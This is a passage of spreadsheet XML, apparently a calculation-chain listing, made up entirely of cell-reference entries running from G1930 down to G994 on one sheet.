  <c r="G1930" i="1"/>
  <c r="G1929" i="1"/>
  <c r="G1928" i="1"/>
  <c r="G1927" i="1"/>
  <c r="G1926" i="1"/>
  <c r="G1925" i="1"/>
  <c r="G1924" i="1"/>
  <c r="G1923" i="1"/>
  <c r="G1922" i="1"/>
  <c r="G1921" i="1"/>
  <c r="G1920" i="1"/>
  <c r="G1919" i="1"/>
  <c r="G1918" i="1"/>
  <c r="G1917" i="1"/>
  <c r="G1916" i="1"/>
  <c r="G1915" i="1"/>
  <c r="G1914" i="1"/>
  <c r="G1913" i="1"/>
  <c r="G1912" i="1"/>
  <c r="G1911" i="1"/>
  <c r="G1910" i="1"/>
  <c r="G1909" i="1"/>
  <c r="G1908" i="1"/>
  <c r="G1907" i="1"/>
  <c r="G1906" i="1"/>
  <c r="G1905" i="1"/>
  <c r="G1904" i="1"/>
  <c r="G1903" i="1"/>
  <c r="G1902" i="1"/>
  <c r="G1901" i="1"/>
  <c r="G1900" i="1"/>
  <c r="G1899" i="1"/>
  <c r="G1898" i="1"/>
  <c r="G1897" i="1"/>
  <c r="G1896" i="1"/>
  <c r="G1895" i="1"/>
  <c r="G1894" i="1"/>
  <c r="G1893" i="1"/>
  <c r="G1892" i="1"/>
  <c r="G1891" i="1"/>
  <c r="G1890" i="1"/>
  <c r="G1889" i="1"/>
  <c r="G1888" i="1"/>
  <c r="G1887" i="1"/>
  <c r="G1886" i="1"/>
  <c r="G1885" i="1"/>
  <c r="G1884" i="1"/>
  <c r="G1883" i="1"/>
  <c r="G1882" i="1"/>
  <c r="G1881" i="1"/>
  <c r="G1880" i="1"/>
  <c r="G1879" i="1"/>
  <c r="G1878" i="1"/>
  <c r="G1877" i="1"/>
  <c r="G1876" i="1"/>
  <c r="G1875" i="1"/>
  <c r="G1874" i="1"/>
  <c r="G1873" i="1"/>
  <c r="G1872" i="1"/>
  <c r="G1871" i="1"/>
  <c r="G1870" i="1"/>
  <c r="G1869" i="1"/>
  <c r="G1868" i="1"/>
  <c r="G1867" i="1"/>
  <c r="G1866" i="1"/>
  <c r="G1865" i="1"/>
  <c r="G1864" i="1"/>
  <c r="G1863" i="1"/>
  <c r="G1862" i="1"/>
  <c r="G1861" i="1"/>
  <c r="G1860" i="1"/>
  <c r="G1859" i="1"/>
  <c r="G1858" i="1"/>
  <c r="G1857" i="1"/>
  <c r="G1856" i="1"/>
  <c r="G1855" i="1"/>
  <c r="G1854" i="1"/>
  <c r="G1853" i="1"/>
  <c r="G1852" i="1"/>
  <c r="G1851" i="1"/>
  <c r="G1850" i="1"/>
  <c r="G1849" i="1"/>
  <c r="G1848" i="1"/>
  <c r="G1847" i="1"/>
  <c r="G1846" i="1"/>
  <c r="G1845" i="1"/>
  <c r="G1844" i="1"/>
  <c r="G1843" i="1"/>
  <c r="G1842" i="1"/>
  <c r="G1841" i="1"/>
  <c r="G1840" i="1"/>
  <c r="G1839" i="1"/>
  <c r="G1838" i="1"/>
  <c r="G1837" i="1"/>
  <c r="G1836" i="1"/>
  <c r="G1835" i="1"/>
  <c r="G1834" i="1"/>
  <c r="G1833" i="1"/>
  <c r="G1832" i="1"/>
  <c r="G1831" i="1"/>
  <c r="G1830" i="1"/>
  <c r="G1829" i="1"/>
  <c r="G1828" i="1"/>
  <c r="G1827" i="1"/>
  <c r="G1826" i="1"/>
  <c r="G1825" i="1"/>
  <c r="G1824" i="1"/>
  <c r="G1823" i="1"/>
  <c r="G1822" i="1"/>
  <c r="G1821" i="1"/>
  <c r="G1820" i="1"/>
  <c r="G1819" i="1"/>
  <c r="G1818" i="1"/>
  <c r="G1817" i="1"/>
  <c r="G1816" i="1"/>
  <c r="G1815" i="1"/>
  <c r="G1814" i="1"/>
  <c r="G1813" i="1"/>
  <c r="G1812" i="1"/>
  <c r="G1811" i="1"/>
  <c r="G1810" i="1"/>
  <c r="G1809" i="1"/>
  <c r="G1808" i="1"/>
  <c r="G1807" i="1"/>
  <c r="G1806" i="1"/>
  <c r="G1805" i="1"/>
  <c r="G1804" i="1"/>
  <c r="G1803" i="1"/>
  <c r="G1802" i="1"/>
  <c r="G1801" i="1"/>
  <c r="G1800" i="1"/>
  <c r="G1799" i="1"/>
  <c r="G1798" i="1"/>
  <c r="G1797" i="1"/>
  <c r="G1796" i="1"/>
  <c r="G1795" i="1"/>
  <c r="G1794" i="1"/>
  <c r="G1793" i="1"/>
  <c r="G1792" i="1"/>
  <c r="G1791" i="1"/>
  <c r="G1790" i="1"/>
  <c r="G1789" i="1"/>
  <c r="G1788" i="1"/>
  <c r="G1787" i="1"/>
  <c r="G1786" i="1"/>
  <c r="G1785" i="1"/>
  <c r="G1784" i="1"/>
  <c r="G1783" i="1"/>
  <c r="G1782" i="1"/>
  <c r="G1781" i="1"/>
  <c r="G1780" i="1"/>
  <c r="G1779" i="1"/>
  <c r="G1778" i="1"/>
  <c r="G1777" i="1"/>
  <c r="G1776" i="1"/>
  <c r="G1775" i="1"/>
  <c r="G1774" i="1"/>
  <c r="G1773" i="1"/>
  <c r="G1772" i="1"/>
  <c r="G1771" i="1"/>
  <c r="G1770" i="1"/>
  <c r="G1769" i="1"/>
  <c r="G1768" i="1"/>
  <c r="G1767" i="1"/>
  <c r="G1766" i="1"/>
  <c r="G1765" i="1"/>
  <c r="G1764" i="1"/>
  <c r="G1763" i="1"/>
  <c r="G1762" i="1"/>
  <c r="G1761" i="1"/>
  <c r="G1760" i="1"/>
  <c r="G1759" i="1"/>
  <c r="G1758" i="1"/>
  <c r="G1757" i="1"/>
  <c r="G1756" i="1"/>
  <c r="G1755" i="1"/>
  <c r="G1754" i="1"/>
  <c r="G1753" i="1"/>
  <c r="G1752" i="1"/>
  <c r="G1751" i="1"/>
  <c r="G1750" i="1"/>
  <c r="G1749" i="1"/>
  <c r="G1748" i="1"/>
  <c r="G1747" i="1"/>
  <c r="G1746" i="1"/>
  <c r="G1745" i="1"/>
  <c r="G1744" i="1"/>
  <c r="G1743" i="1"/>
  <c r="G1742" i="1"/>
  <c r="G1741" i="1"/>
  <c r="G1740" i="1"/>
  <c r="G1739" i="1"/>
  <c r="G1738" i="1"/>
  <c r="G1737" i="1"/>
  <c r="G1736" i="1"/>
  <c r="G1735" i="1"/>
  <c r="G1734" i="1"/>
  <c r="G1733" i="1"/>
  <c r="G1732" i="1"/>
  <c r="G1731" i="1"/>
  <c r="G1730" i="1"/>
  <c r="G1729" i="1"/>
  <c r="G1728" i="1"/>
  <c r="G1727" i="1"/>
  <c r="G1726" i="1"/>
  <c r="G1725" i="1"/>
  <c r="G1724" i="1"/>
  <c r="G1723" i="1"/>
  <c r="G1722" i="1"/>
  <c r="G1721" i="1"/>
  <c r="G1720" i="1"/>
  <c r="G1719" i="1"/>
  <c r="G1718" i="1"/>
  <c r="G1717" i="1"/>
  <c r="G1716" i="1"/>
  <c r="G1715" i="1"/>
  <c r="G1714" i="1"/>
  <c r="G1713" i="1"/>
  <c r="G1712" i="1"/>
  <c r="G1711" i="1"/>
  <c r="G1710" i="1"/>
  <c r="G1709" i="1"/>
  <c r="G1708" i="1"/>
  <c r="G1707" i="1"/>
  <c r="G1706" i="1"/>
  <c r="G1705" i="1"/>
  <c r="G1704" i="1"/>
  <c r="G1703" i="1"/>
  <c r="G1702" i="1"/>
  <c r="G1701" i="1"/>
  <c r="G1700" i="1"/>
  <c r="G1699" i="1"/>
  <c r="G1698" i="1"/>
  <c r="G1697" i="1"/>
  <c r="G1696" i="1"/>
  <c r="G1695" i="1"/>
  <c r="G1694" i="1"/>
  <c r="G1693" i="1"/>
  <c r="G1692" i="1"/>
  <c r="G1691" i="1"/>
  <c r="G1690" i="1"/>
  <c r="G1689" i="1"/>
  <c r="G1688" i="1"/>
  <c r="G1687" i="1"/>
  <c r="G1686" i="1"/>
  <c r="G1685" i="1"/>
  <c r="G1684" i="1"/>
  <c r="G1683" i="1"/>
  <c r="G1682" i="1"/>
  <c r="G1681" i="1"/>
  <c r="G1680" i="1"/>
  <c r="G1679" i="1"/>
  <c r="G1678" i="1"/>
  <c r="G1677" i="1"/>
  <c r="G1676" i="1"/>
  <c r="G1675" i="1"/>
  <c r="G1674" i="1"/>
  <c r="G1673" i="1"/>
  <c r="G1672" i="1"/>
  <c r="G1671" i="1"/>
  <c r="G1670" i="1"/>
  <c r="G1669" i="1"/>
  <c r="G1668" i="1"/>
  <c r="G1667" i="1"/>
  <c r="G1666" i="1"/>
  <c r="G1665" i="1"/>
  <c r="G1664" i="1"/>
  <c r="G1663" i="1"/>
  <c r="G1662" i="1"/>
  <c r="G1661" i="1"/>
  <c r="G1660" i="1"/>
  <c r="G1659" i="1"/>
  <c r="G1658" i="1"/>
  <c r="G1657" i="1"/>
  <c r="G1656" i="1"/>
  <c r="G1655" i="1"/>
  <c r="G1654" i="1"/>
  <c r="G1653" i="1"/>
  <c r="G1652" i="1"/>
  <c r="G1651" i="1"/>
  <c r="G1650" i="1"/>
  <c r="G1649" i="1"/>
  <c r="G1648" i="1"/>
  <c r="G1647" i="1"/>
  <c r="G1646" i="1"/>
  <c r="G1645" i="1"/>
  <c r="G1644" i="1"/>
  <c r="G1643" i="1"/>
  <c r="G1642" i="1"/>
  <c r="G1641" i="1"/>
  <c r="G1640" i="1"/>
  <c r="G1639" i="1"/>
  <c r="G1638" i="1"/>
  <c r="G1637" i="1"/>
  <c r="G1636" i="1"/>
  <c r="G1635" i="1"/>
  <c r="G1634" i="1"/>
  <c r="G1633" i="1"/>
  <c r="G1632" i="1"/>
  <c r="G1631" i="1"/>
  <c r="G1630" i="1"/>
  <c r="G1629" i="1"/>
  <c r="G1628" i="1"/>
  <c r="G1627" i="1"/>
  <c r="G1626" i="1"/>
  <c r="G1625" i="1"/>
  <c r="G1624" i="1"/>
  <c r="G1623" i="1"/>
  <c r="G1622" i="1"/>
  <c r="G1621" i="1"/>
  <c r="G1620" i="1"/>
  <c r="G1619" i="1"/>
  <c r="G1618" i="1"/>
  <c r="G1617" i="1"/>
  <c r="G1616" i="1"/>
  <c r="G1615" i="1"/>
  <c r="G1614" i="1"/>
  <c r="G1613" i="1"/>
  <c r="G1612" i="1"/>
  <c r="G1611" i="1"/>
  <c r="G1610" i="1"/>
  <c r="G1609" i="1"/>
  <c r="G1608" i="1"/>
  <c r="G1607" i="1"/>
  <c r="G1606" i="1"/>
  <c r="G1605" i="1"/>
  <c r="G1604" i="1"/>
  <c r="G1603" i="1"/>
  <c r="G1602" i="1"/>
  <c r="G1601" i="1"/>
  <c r="G1600" i="1"/>
  <c r="G1599" i="1"/>
  <c r="G1598" i="1"/>
  <c r="G1597" i="1"/>
  <c r="G1596" i="1"/>
  <c r="G1595" i="1"/>
  <c r="G1594" i="1"/>
  <c r="G1593" i="1"/>
  <c r="G1592" i="1"/>
  <c r="G1591" i="1"/>
  <c r="G1590" i="1"/>
  <c r="G1589" i="1"/>
  <c r="G1588" i="1"/>
  <c r="G1587" i="1"/>
  <c r="G1586" i="1"/>
  <c r="G1585" i="1"/>
  <c r="G1584" i="1"/>
  <c r="G1583" i="1"/>
  <c r="G1582" i="1"/>
  <c r="G1581" i="1"/>
  <c r="G1580" i="1"/>
  <c r="G1579" i="1"/>
  <c r="G1578" i="1"/>
  <c r="G1577" i="1"/>
  <c r="G1576" i="1"/>
  <c r="G1575" i="1"/>
  <c r="G1574" i="1"/>
  <c r="G1573" i="1"/>
  <c r="G1572" i="1"/>
  <c r="G1571" i="1"/>
  <c r="G1570" i="1"/>
  <c r="G1569" i="1"/>
  <c r="G1568" i="1"/>
  <c r="G1567" i="1"/>
  <c r="G1566" i="1"/>
  <c r="G1565" i="1"/>
  <c r="G1564" i="1"/>
  <c r="G1563" i="1"/>
  <c r="G1562" i="1"/>
  <c r="G1561" i="1"/>
  <c r="G1560" i="1"/>
  <c r="G1559" i="1"/>
  <c r="G1558" i="1"/>
  <c r="G1557" i="1"/>
  <c r="G1556" i="1"/>
  <c r="G1555" i="1"/>
  <c r="G1554" i="1"/>
  <c r="G1553" i="1"/>
  <c r="G1552" i="1"/>
  <c r="G1551" i="1"/>
  <c r="G1550" i="1"/>
  <c r="G1549" i="1"/>
  <c r="G1548" i="1"/>
  <c r="G1547" i="1"/>
  <c r="G1546" i="1"/>
  <c r="G1545" i="1"/>
  <c r="G1544" i="1"/>
  <c r="G1543" i="1"/>
  <c r="G1542" i="1"/>
  <c r="G1541" i="1"/>
  <c r="G1540" i="1"/>
  <c r="G1539" i="1"/>
  <c r="G1538" i="1"/>
  <c r="G1537" i="1"/>
  <c r="G1536" i="1"/>
  <c r="G1535" i="1"/>
  <c r="G1534" i="1"/>
  <c r="G1533" i="1"/>
  <c r="G1532" i="1"/>
  <c r="G1531" i="1"/>
  <c r="G1530" i="1"/>
  <c r="G1529" i="1"/>
  <c r="G1528" i="1"/>
  <c r="G1527" i="1"/>
  <c r="G1526" i="1"/>
  <c r="G1525" i="1"/>
  <c r="G1524" i="1"/>
  <c r="G1523" i="1"/>
  <c r="G1522" i="1"/>
  <c r="G1521" i="1"/>
  <c r="G1520" i="1"/>
  <c r="G1519" i="1"/>
  <c r="G1518" i="1"/>
  <c r="G1517" i="1"/>
  <c r="G1516" i="1"/>
  <c r="G1515" i="1"/>
  <c r="G1514" i="1"/>
  <c r="G1513" i="1"/>
  <c r="G1512" i="1"/>
  <c r="G1511" i="1"/>
  <c r="G1510" i="1"/>
  <c r="G1509" i="1"/>
  <c r="G1508" i="1"/>
  <c r="G1507" i="1"/>
  <c r="G1506" i="1"/>
  <c r="G1505" i="1"/>
  <c r="G1504" i="1"/>
  <c r="G1503" i="1"/>
  <c r="G1502" i="1"/>
  <c r="G1501" i="1"/>
  <c r="G1500" i="1"/>
  <c r="G1499" i="1"/>
  <c r="G1498" i="1"/>
  <c r="G1497" i="1"/>
  <c r="G1496" i="1"/>
  <c r="G1495" i="1"/>
  <c r="G1494" i="1"/>
  <c r="G1493" i="1"/>
  <c r="G1492" i="1"/>
  <c r="G1491" i="1"/>
  <c r="G1490" i="1"/>
  <c r="G1489" i="1"/>
  <c r="G1488" i="1"/>
  <c r="G1487" i="1"/>
  <c r="G1486" i="1"/>
  <c r="G1485" i="1"/>
  <c r="G1484" i="1"/>
  <c r="G1483" i="1"/>
  <c r="G1482" i="1"/>
  <c r="G1481" i="1"/>
  <c r="G1480" i="1"/>
  <c r="G1479" i="1"/>
  <c r="G1478" i="1"/>
  <c r="G1477" i="1"/>
  <c r="G1476" i="1"/>
  <c r="G1475" i="1"/>
  <c r="G1474" i="1"/>
  <c r="G1473" i="1"/>
  <c r="G1472" i="1"/>
  <c r="G1471" i="1"/>
  <c r="G1470" i="1"/>
  <c r="G1469" i="1"/>
  <c r="G1468" i="1"/>
  <c r="G1467" i="1"/>
  <c r="G1466" i="1"/>
  <c r="G1465" i="1"/>
  <c r="G1464" i="1"/>
  <c r="G1463" i="1"/>
  <c r="G1462" i="1"/>
  <c r="G1461" i="1"/>
  <c r="G1460" i="1"/>
  <c r="G1459" i="1"/>
  <c r="G1458" i="1"/>
  <c r="G1457" i="1"/>
  <c r="G1456" i="1"/>
  <c r="G1455" i="1"/>
  <c r="G1454" i="1"/>
  <c r="G1453" i="1"/>
  <c r="G1452" i="1"/>
  <c r="G1451" i="1"/>
  <c r="G1450" i="1"/>
  <c r="G1449" i="1"/>
  <c r="G1448" i="1"/>
  <c r="G1447" i="1"/>
  <c r="G1446" i="1"/>
  <c r="G1445" i="1"/>
  <c r="G1444" i="1"/>
  <c r="G1443" i="1"/>
  <c r="G1442" i="1"/>
  <c r="G1441" i="1"/>
  <c r="G1440" i="1"/>
  <c r="G1439" i="1"/>
  <c r="G1438" i="1"/>
  <c r="G1437" i="1"/>
  <c r="G1436" i="1"/>
  <c r="G1435" i="1"/>
  <c r="G1434" i="1"/>
  <c r="G1433" i="1"/>
  <c r="G1432" i="1"/>
  <c r="G1431" i="1"/>
  <c r="G1430" i="1"/>
  <c r="G1429" i="1"/>
  <c r="G1428" i="1"/>
  <c r="G1427" i="1"/>
  <c r="G1426" i="1"/>
  <c r="G1425" i="1"/>
  <c r="G1424" i="1"/>
  <c r="G1423" i="1"/>
  <c r="G1422" i="1"/>
  <c r="G1421" i="1"/>
  <c r="G1420" i="1"/>
  <c r="G1419" i="1"/>
  <c r="G1418" i="1"/>
  <c r="G1417" i="1"/>
  <c r="G1416" i="1"/>
  <c r="G1415" i="1"/>
  <c r="G1414" i="1"/>
  <c r="G1413" i="1"/>
  <c r="G1412" i="1"/>
  <c r="G1411" i="1"/>
  <c r="G1410" i="1"/>
  <c r="G1409" i="1"/>
  <c r="G1408" i="1"/>
  <c r="G1407" i="1"/>
  <c r="G1406" i="1"/>
  <c r="G1405" i="1"/>
  <c r="G1404" i="1"/>
  <c r="G1403" i="1"/>
  <c r="G1402" i="1"/>
  <c r="G1401" i="1"/>
  <c r="G1400" i="1"/>
  <c r="G1399" i="1"/>
  <c r="G1398" i="1"/>
  <c r="G1397" i="1"/>
  <c r="G1396" i="1"/>
  <c r="G1395" i="1"/>
  <c r="G1394" i="1"/>
  <c r="G1393" i="1"/>
  <c r="G1392" i="1"/>
  <c r="G1391" i="1"/>
  <c r="G1390" i="1"/>
  <c r="G1389" i="1"/>
  <c r="G1388" i="1"/>
  <c r="G1387" i="1"/>
  <c r="G1386" i="1"/>
  <c r="G1385" i="1"/>
  <c r="G1384" i="1"/>
  <c r="G1383" i="1"/>
  <c r="G1382" i="1"/>
  <c r="G1381" i="1"/>
  <c r="G1380" i="1"/>
  <c r="G1379" i="1"/>
  <c r="G1378" i="1"/>
  <c r="G1377" i="1"/>
  <c r="G1376" i="1"/>
  <c r="G1375" i="1"/>
  <c r="G1374" i="1"/>
  <c r="G1373" i="1"/>
  <c r="G1372" i="1"/>
  <c r="G1371" i="1"/>
  <c r="G1370" i="1"/>
  <c r="G1369" i="1"/>
  <c r="G1368" i="1"/>
  <c r="G1367" i="1"/>
  <c r="G1366" i="1"/>
  <c r="G1365" i="1"/>
  <c r="G1364" i="1"/>
  <c r="G1363" i="1"/>
  <c r="G1362" i="1"/>
  <c r="G1361" i="1"/>
  <c r="G1360" i="1"/>
  <c r="G1359" i="1"/>
  <c r="G1358" i="1"/>
  <c r="G1357" i="1"/>
  <c r="G1356" i="1"/>
  <c r="G1355" i="1"/>
  <c r="G1354" i="1"/>
  <c r="G1353" i="1"/>
  <c r="G1352" i="1"/>
  <c r="G1351" i="1"/>
  <c r="G1350" i="1"/>
  <c r="G1349" i="1"/>
  <c r="G1348" i="1"/>
  <c r="G1347" i="1"/>
  <c r="G1346" i="1"/>
  <c r="G1345" i="1"/>
  <c r="G1344" i="1"/>
  <c r="G1343" i="1"/>
  <c r="G1342" i="1"/>
  <c r="G1341" i="1"/>
  <c r="G1340" i="1"/>
  <c r="G1339" i="1"/>
  <c r="G1338" i="1"/>
  <c r="G1337" i="1"/>
  <c r="G1336" i="1"/>
  <c r="G1335" i="1"/>
  <c r="G1334" i="1"/>
  <c r="G1333" i="1"/>
  <c r="G1332" i="1"/>
  <c r="G1331" i="1"/>
  <c r="G1330" i="1"/>
  <c r="G1329" i="1"/>
  <c r="G1328" i="1"/>
  <c r="G1327" i="1"/>
  <c r="G1326" i="1"/>
  <c r="G1325" i="1"/>
  <c r="G1324" i="1"/>
  <c r="G1323" i="1"/>
  <c r="G1322" i="1"/>
  <c r="G1321" i="1"/>
  <c r="G1320" i="1"/>
  <c r="G1319" i="1"/>
  <c r="G1318" i="1"/>
  <c r="G1317" i="1"/>
  <c r="G1316" i="1"/>
  <c r="G1315" i="1"/>
  <c r="G1314" i="1"/>
  <c r="G1313" i="1"/>
  <c r="G1312" i="1"/>
  <c r="G1311" i="1"/>
  <c r="G1310" i="1"/>
  <c r="G1309" i="1"/>
  <c r="G1308" i="1"/>
  <c r="G1307" i="1"/>
  <c r="G1306" i="1"/>
  <c r="G1305" i="1"/>
  <c r="G1304" i="1"/>
  <c r="G1303" i="1"/>
  <c r="G1302" i="1"/>
  <c r="G1301" i="1"/>
  <c r="G1300" i="1"/>
  <c r="G1299" i="1"/>
  <c r="G1298" i="1"/>
  <c r="G1297" i="1"/>
  <c r="G1296" i="1"/>
  <c r="G1295" i="1"/>
  <c r="G1294" i="1"/>
  <c r="G1293" i="1"/>
  <c r="G1292" i="1"/>
  <c r="G1291" i="1"/>
  <c r="G1290" i="1"/>
  <c r="G1289" i="1"/>
  <c r="G1288" i="1"/>
  <c r="G1287" i="1"/>
  <c r="G1286" i="1"/>
  <c r="G1285" i="1"/>
  <c r="G1284" i="1"/>
  <c r="G1283" i="1"/>
  <c r="G1282" i="1"/>
  <c r="G1281" i="1"/>
  <c r="G1280" i="1"/>
  <c r="G1279" i="1"/>
  <c r="G1278" i="1"/>
  <c r="G1277" i="1"/>
  <c r="G1276" i="1"/>
  <c r="G1275" i="1"/>
  <c r="G1274" i="1"/>
  <c r="G1273" i="1"/>
  <c r="G1272" i="1"/>
  <c r="G1271" i="1"/>
  <c r="G1270" i="1"/>
  <c r="G1269" i="1"/>
  <c r="G1268" i="1"/>
  <c r="G1267" i="1"/>
  <c r="G1266" i="1"/>
  <c r="G1265" i="1"/>
  <c r="G1264" i="1"/>
  <c r="G1263" i="1"/>
  <c r="G1262" i="1"/>
  <c r="G1261" i="1"/>
  <c r="G1260" i="1"/>
  <c r="G1259" i="1"/>
  <c r="G1258" i="1"/>
  <c r="G1257" i="1"/>
  <c r="G1256" i="1"/>
  <c r="G1255" i="1"/>
  <c r="G1254" i="1"/>
  <c r="G1253" i="1"/>
  <c r="G1252" i="1"/>
  <c r="G1251" i="1"/>
  <c r="G1250" i="1"/>
  <c r="G1249" i="1"/>
  <c r="G1248" i="1"/>
  <c r="G1247" i="1"/>
  <c r="G1246" i="1"/>
  <c r="G1245" i="1"/>
  <c r="G1244" i="1"/>
  <c r="G1243" i="1"/>
  <c r="G1242" i="1"/>
  <c r="G1241" i="1"/>
  <c r="G1240" i="1"/>
  <c r="G1239" i="1"/>
  <c r="G1238" i="1"/>
  <c r="G1237" i="1"/>
  <c r="G1236" i="1"/>
  <c r="G1235" i="1"/>
  <c r="G1234" i="1"/>
  <c r="G1233" i="1"/>
  <c r="G1232" i="1"/>
  <c r="G1231" i="1"/>
  <c r="G1230" i="1"/>
  <c r="G1229" i="1"/>
  <c r="G1228" i="1"/>
  <c r="G1227" i="1"/>
  <c r="G1226" i="1"/>
  <c r="G1225" i="1"/>
  <c r="G1224" i="1"/>
  <c r="G1223" i="1"/>
  <c r="G1222" i="1"/>
  <c r="G1221" i="1"/>
  <c r="G1220" i="1"/>
  <c r="G1219" i="1"/>
  <c r="G1218" i="1"/>
  <c r="G1217" i="1"/>
  <c r="G1216" i="1"/>
  <c r="G1215" i="1"/>
  <c r="G1214" i="1"/>
  <c r="G1213" i="1"/>
  <c r="G1212" i="1"/>
  <c r="G1211" i="1"/>
  <c r="G1210" i="1"/>
  <c r="G1209" i="1"/>
  <c r="G1208" i="1"/>
  <c r="G1207" i="1"/>
  <c r="G1206" i="1"/>
  <c r="G1205" i="1"/>
  <c r="G1204" i="1"/>
  <c r="G1203" i="1"/>
  <c r="G1202" i="1"/>
  <c r="G1201" i="1"/>
  <c r="G1200" i="1"/>
  <c r="G1199" i="1"/>
  <c r="G1198" i="1"/>
  <c r="G1197" i="1"/>
  <c r="G1196" i="1"/>
  <c r="G1195" i="1"/>
  <c r="G1194" i="1"/>
  <c r="G1193" i="1"/>
  <c r="G1192" i="1"/>
  <c r="G1191" i="1"/>
  <c r="G1190" i="1"/>
  <c r="G1189" i="1"/>
  <c r="G1188" i="1"/>
  <c r="G1187" i="1"/>
  <c r="G1186" i="1"/>
  <c r="G1185" i="1"/>
  <c r="G1184" i="1"/>
  <c r="G1183" i="1"/>
  <c r="G1182" i="1"/>
  <c r="G1181" i="1"/>
  <c r="G1180" i="1"/>
  <c r="G1179" i="1"/>
  <c r="G1178" i="1"/>
  <c r="G1177" i="1"/>
  <c r="G1176" i="1"/>
  <c r="G1175" i="1"/>
  <c r="G1174" i="1"/>
  <c r="G1173" i="1"/>
  <c r="G1172" i="1"/>
  <c r="G1171" i="1"/>
  <c r="G1170" i="1"/>
  <c r="G1169" i="1"/>
  <c r="G1168" i="1"/>
  <c r="G1167" i="1"/>
  <c r="G1166" i="1"/>
  <c r="G1165" i="1"/>
  <c r="G1164" i="1"/>
  <c r="G1163" i="1"/>
  <c r="G1162" i="1"/>
  <c r="G1161" i="1"/>
  <c r="G1160" i="1"/>
  <c r="G1159" i="1"/>
  <c r="G1158" i="1"/>
  <c r="G1157" i="1"/>
  <c r="G1156" i="1"/>
  <c r="G1155" i="1"/>
  <c r="G1154" i="1"/>
  <c r="G1153" i="1"/>
  <c r="G1152" i="1"/>
  <c r="G1151" i="1"/>
  <c r="G1150" i="1"/>
  <c r="G1149" i="1"/>
  <c r="G1148" i="1"/>
  <c r="G1147" i="1"/>
  <c r="G1146" i="1"/>
  <c r="G1145" i="1"/>
  <c r="G1144" i="1"/>
  <c r="G1143" i="1"/>
  <c r="G1142" i="1"/>
  <c r="G1141" i="1"/>
  <c r="G1140" i="1"/>
  <c r="G1139" i="1"/>
  <c r="G1138" i="1"/>
  <c r="G1137" i="1"/>
  <c r="G1136" i="1"/>
  <c r="G1135" i="1"/>
  <c r="G1134" i="1"/>
  <c r="G1133" i="1"/>
  <c r="G1132" i="1"/>
  <c r="G1131" i="1"/>
  <c r="G1130" i="1"/>
  <c r="G1129" i="1"/>
  <c r="G1128" i="1"/>
  <c r="G1127" i="1"/>
  <c r="G1126" i="1"/>
  <c r="G1125" i="1"/>
  <c r="G1124" i="1"/>
  <c r="G1123" i="1"/>
  <c r="G1122" i="1"/>
  <c r="G1121" i="1"/>
  <c r="G1120" i="1"/>
  <c r="G1119" i="1"/>
  <c r="G1118" i="1"/>
  <c r="G1117" i="1"/>
  <c r="G1116" i="1"/>
  <c r="G1115" i="1"/>
  <c r="G1114" i="1"/>
  <c r="G1113" i="1"/>
  <c r="G1112" i="1"/>
  <c r="G1111" i="1"/>
  <c r="G1110" i="1"/>
  <c r="G1109" i="1"/>
  <c r="G1108" i="1"/>
  <c r="G1107" i="1"/>
  <c r="G1106" i="1"/>
  <c r="G1105" i="1"/>
  <c r="G1104" i="1"/>
  <c r="G1103" i="1"/>
  <c r="G1102" i="1"/>
  <c r="G1101" i="1"/>
  <c r="G1100" i="1"/>
  <c r="G1099" i="1"/>
  <c r="G1098" i="1"/>
  <c r="G1097" i="1"/>
  <c r="G1096" i="1"/>
  <c r="G1095" i="1"/>
  <c r="G1094" i="1"/>
  <c r="G1093" i="1"/>
  <c r="G1092" i="1"/>
  <c r="G1091" i="1"/>
  <c r="G1090" i="1"/>
  <c r="G1089" i="1"/>
  <c r="G1088" i="1"/>
  <c r="G1087" i="1"/>
  <c r="G1086" i="1"/>
  <c r="G1085" i="1"/>
  <c r="G1084" i="1"/>
  <c r="G1083" i="1"/>
  <c r="G1082" i="1"/>
  <c r="G1081" i="1"/>
  <c r="G1080" i="1"/>
  <c r="G1079" i="1"/>
  <c r="G1078" i="1"/>
  <c r="G1077" i="1"/>
  <c r="G1076" i="1"/>
  <c r="G1075" i="1"/>
  <c r="G1074" i="1"/>
  <c r="G1073" i="1"/>
  <c r="G1072" i="1"/>
  <c r="G1071" i="1"/>
  <c r="G1070" i="1"/>
  <c r="G1069" i="1"/>
  <c r="G1068" i="1"/>
  <c r="G1067" i="1"/>
  <c r="G1066" i="1"/>
  <c r="G1065" i="1"/>
  <c r="G1064" i="1"/>
  <c r="G1063" i="1"/>
  <c r="G1062" i="1"/>
  <c r="G1061" i="1"/>
  <c r="G1060" i="1"/>
  <c r="G1059" i="1"/>
  <c r="G1058" i="1"/>
  <c r="G1057" i="1"/>
  <c r="G1056" i="1"/>
  <c r="G1055" i="1"/>
  <c r="G1054" i="1"/>
  <c r="G1053" i="1"/>
  <c r="G1052" i="1"/>
  <c r="G1051" i="1"/>
  <c r="G1050" i="1"/>
  <c r="G1049" i="1"/>
  <c r="G1048" i="1"/>
  <c r="G1047" i="1"/>
  <c r="G1046" i="1"/>
  <c r="G1045" i="1"/>
  <c r="G1044" i="1"/>
  <c r="G1043" i="1"/>
  <c r="G1042" i="1"/>
  <c r="G1041" i="1"/>
  <c r="G1040" i="1"/>
  <c r="G1039" i="1"/>
  <c r="G1038" i="1"/>
  <c r="G1037" i="1"/>
  <c r="G1036" i="1"/>
  <c r="G1035" i="1"/>
  <c r="G1034" i="1"/>
  <c r="G1033" i="1"/>
  <c r="G1032" i="1"/>
  <c r="G1031" i="1"/>
  <c r="G1030" i="1"/>
  <c r="G1029" i="1"/>
  <c r="G1028" i="1"/>
  <c r="G1027" i="1"/>
  <c r="G1026" i="1"/>
  <c r="G1025" i="1"/>
  <c r="G1024" i="1"/>
  <c r="G1023" i="1"/>
  <c r="G1022" i="1"/>
  <c r="G1021" i="1"/>
  <c r="G1020" i="1"/>
  <c r="G1019" i="1"/>
  <c r="G1018" i="1"/>
  <c r="G1017" i="1"/>
  <c r="G1016" i="1"/>
  <c r="G1015" i="1"/>
  <c r="G1014" i="1"/>
  <c r="G1013" i="1"/>
  <c r="G1012" i="1"/>
  <c r="G1011" i="1"/>
  <c r="G1010" i="1"/>
  <c r="G1009" i="1"/>
  <c r="G1008" i="1"/>
  <c r="G1007" i="1"/>
  <c r="G1006" i="1"/>
  <c r="G1005" i="1"/>
  <c r="G1004" i="1"/>
  <c r="G1003" i="1"/>
  <c r="G1002" i="1"/>
  <c r="G1001" i="1"/>
  <c r="G1000" i="1"/>
  <c r="G999" i="1"/>
  <c r="G998" i="1"/>
  <c r="G997" i="1"/>
  <c r="G996" i="1"/>
  <c r="G995" i="1"/>
  <c r="G994" i="1"/>
